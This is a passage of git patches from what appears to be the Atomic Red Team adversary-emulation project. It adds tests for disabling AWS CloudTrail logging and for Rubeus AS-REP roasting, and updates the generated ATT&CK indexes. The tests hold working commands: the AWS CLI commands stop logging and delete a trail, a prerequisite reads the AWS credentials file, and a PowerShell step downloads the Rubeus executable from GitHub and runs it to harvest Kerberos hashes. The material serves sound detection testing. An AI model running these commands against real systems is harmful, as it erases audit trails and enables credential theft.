mics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 2b76f2d9..b49f990a 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -278,6 +278,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
 defense-evasion,T1610,Deploy Container,1,Deploy container using nsenter container escape,58004e22-022c-4c51-b4a8-2b85ac5c596b,sh
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
+defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
 defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 5570cf12..a87b19bb 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -71,6 +71,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
 defense-evasion,T1610,Deploy Container,1,Deploy container using nsenter container escape,58004e22-022c-4c51-b4a8-2b85ac5c596b,sh
+defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 68898e7c..cfa4b82f 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -502,7 +502,8 @@
   - Atomic Test #1: Deploy container using nsenter container escape [linux]
 - [T1006 Direct Volume Access](../../T1006/T1006.md)
   - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
-- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md)
+  - Atomic Test #1: AWS CloudTrail Changes [iaas:aws]
 - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
   - Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 58056a51..d8878c2a 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -189,7 +189,8 @@
   - Atomic Test #6: Hex decoding with shell utilities [linux, macos]
 - [T1610 Deploy Container](../../T1610/T1610.md)
   - Atomic Test #1: Deploy container using nsenter container escape [linux]
-- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md)
+  - Atomic Test #1: AWS CloudTrail Changes [iaas:aws]
 - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index 0dd361b8..f84a275e 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -16,7 +16,7 @@
 | Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Escape to Host](../../T1611/T1611.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Local Account](../../T1087.001/T1087.001.md) |  | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Python](../../T1059.006/T1059.006.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) |  | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) |  | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Cloud Logs](../../T1562.008/T1562.008.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) |  | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) |  | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) |  | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 2cd550c4..089d1b3c 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -32,7 +32,7 @@
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | [Software Deployment Tools](../../T1072/T1072.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Screen Capture](../../T1113/T1113.md) |  | [Protocol Tunneling](../../T1572/T1572.md) |  |
+|  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Cloud Logs](../../T1562.008/T1562.008.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Screen Capture](../../T1113/T1113.md) |  | [Protocol Tunneling](../../T1572/T1572.md) |  |
 |  | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | [Unix Shell](../../T1059.004/T1059.004.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Escape to Host](../../T1611/T1611.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) |  | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Remote Access Software](../../T1219/T1219.md) |  |
 |  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Standard Encoding](../../T1132.001/T1132.001.md) |  |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index a7d4214d..03b104ef 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -22565,7 +22565,50 @@ defense-evasion:
       - Matt Snyder, VMware
       x_mitre_platforms:
       - IaaS
-    atomic_tests: []
+      identifier: T1562.008
+    atomic_tests:
+    - name: AWS CloudTrail Changes
+      auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
+      description: 'Creates a new cloudTrail in AWS, Upon successful creation it will
+        Update,Stop and Delete the cloudTrail
+
+'
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        cloudtrail_name:
+          description: Name of the cloudTrail
+          type: String
+          default: redatomictesttrail
+        s3_bucket_name:
+          description: Name of the bucket
+          type: String
+          default: redatomic-test
+        region:
+          description: Name of the region
+          type: String
+          default: us-east-1
+      dependencies:
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+'
+        prereq_command: |
+          cat ~/.aws/credentials | grep "default"
+          aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}
+          aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          defult profile using: aws configure
+
+'
+      executor:
+        command: |
+          aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region}
+          aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name}  --is-multi-region-trail --region #{region}
+          aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
+          aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
+        cleanup_command: "aws s3 rb s3://#{s3_bucket_name} --force \n"
+        name: sh
+        elevation_required: false
   T1600.002:
     technique:
       id: attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5
diff --git a/atomics/T1562.008/T1562.008.md b/atomics/T1562.008/T1562.008.md
new file mode 100644
index 00000000..1ab059ae
--- /dev/null
+++ b/atomics/T1562.008/T1562.008.md
@@ -0,0 +1,67 @@
+# T1562.008 - Disable Cloud Logs
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562/008)
+<blockquote>An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. 
+
+Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - AWS CloudTrail Changes](#atomic-test-1---aws-cloudtrail-changes)
+
+
+<br/>
+
+## Atomic Test #1 - AWS CloudTrail Changes
+Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| cloudtrail_name | Name of the cloudTrail | String | redatomictesttrail|
+| s3_bucket_name | Name of the bucket | String | redatomic-test|
+| region | Name of the region | String | us-east-1|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region}
+aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name}  --is-multi-region-trail --region #{region}
+aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
+aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
+```
+
+#### Cleanup Commands:
+```sh
+aws s3 rb s3://#{s3_bucket_name} --force
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Check if ~/.aws/credentials file has a default stanza is configured
+##### Check Prereq Commands:
+```sh
+cat ~/.aws/credentials | grep "default"
+aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}
+aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json
+```
+##### Get Prereq Commands:
+```sh
+echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+```
+
+
+
+
+<br/>

From 39edc22a9f30692b165231add985f932f7e0cb71 Mon Sep 17 00:00:00 2001
From: Brandon Morgan <brandon.morgan@outlook.com>
Date: Wed, 18 Aug 2021 16:17:01 -0500
Subject: [PATCH 22/39] T1558 rubeus (#1603)

* intial rubeus test

* update exe url

* fix command strings

* permalink, elevation, cleanup command

Co-authored-by: Brandon Morgan <bmorgan@nti.local>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1558.004/T1558.004.yaml | 48 ++++++++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 atomics/T1558.004/T1558.004.yaml

diff --git a/atomics/T1558.004/T1558.004.yaml b/atomics/T1558.004/T1558.004.yaml
new file mode 100644
index 00000000..5efff34e
--- /dev/null
+++ b/atomics/T1558.004/T1558.004.yaml
@@ -0,0 +1,48 @@
+attack_technique: T1558.004
+display_name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
+atomic_tests:
+- name: Rubeus asreproast
+  description: |
+    Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+    This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+  supported_platforms:
+  - windows
+  input_arguments:
+    local_folder:
+      description: Local path of Rubeus executable
+      type: Path
+      default: $Env:temp
+    local_executable:
+      description: name of the rubeus executable
+      type: String
+      default: 'rubeus.exe'
+    out_file:
+      description: file where command results are stored
+      type: String
+      default: rubeus_output.txt
+    rubeus_url:
+      description: URL of Rubeus executable
+      type: url
+      default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Computer must be domain joined
+    prereq_command: |
+      if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Write-Host Joining this computer to a domain must be done manually
+  - description: |
+      Rubeus must exist
+    prereq_command: |
+      if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+  executor:
+    command: |
+      cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}"
+    cleanup_command: |
+      Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+    name: powershell
+    elevation_required: false
+  
\ No newline at end of file

From f92bd6473f386e9a41e270fcff0f5df1d4df369f Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Wed, 18 Aug 2021 21:17:32 +0000
Subject: [PATCH 23/39] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1558.004/T1558.004.yaml | 1 +
 atomics/used_guids.txt           | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1558.004/T1558.004.yaml b/atomics/T1558.004/T1558.004.yaml
index 5efff34e..2b458c88 100644
--- a/atomics/T1558.004/T1558.004.yaml
+++ b/atomics/T1558.004/T1558.004.yaml
@@ -2,6 +2,7 @@ attack_technique: T1558.004
 display_name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
 atomic_tests:
 - name: Rubeus asreproast
+  auto_generated_guid: 615bd568-2859-41b5-9aed-61f6a88e48dd
   description: |
     Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
     This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 4051f6a4..a8291305 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -763,3 +763,4 @@ eeb9751a-d598-42d3-b11c-c122d9c3f6c7
 9d77fed7-05f8-476e-a81b-8ff0472c64d0
 aa6cb8c4-b582-4f8e-b677-37733914abda
 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
+615bd568-2859-41b5-9aed-61f6a88e48dd

From 37ce8d9be85e187982a2bb0af1f7eb37de15aa58 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Wed, 18 Aug 2021 21:17:37 +0000
Subject: [PATCH 24/39] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 .../art-navigator-layer-windows.json          |  2 +-
 .../art-navigator-layer.json                  |  2 +-
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  3 +-
 .../Indexes/Indexes-Markdown/windows-index.md |  3 +-
 atomics/Indexes/Matrices/matrix.md            |  2 +-
 atomics/Indexes/Matrices/windows-matrix.md    |  2 +-
 atomics/Indexes/index.yaml                    | 59 +++++++++++++-
 atomics/T1558.004/T1558.004.md                | 79 +++++++++++++++++++
 10 files changed, 147 insertions(+), 7 deletions(-)
 create mode 100644 atomics/T1558.004/T1558.004.md

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 606f3545..2dc3ea92 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":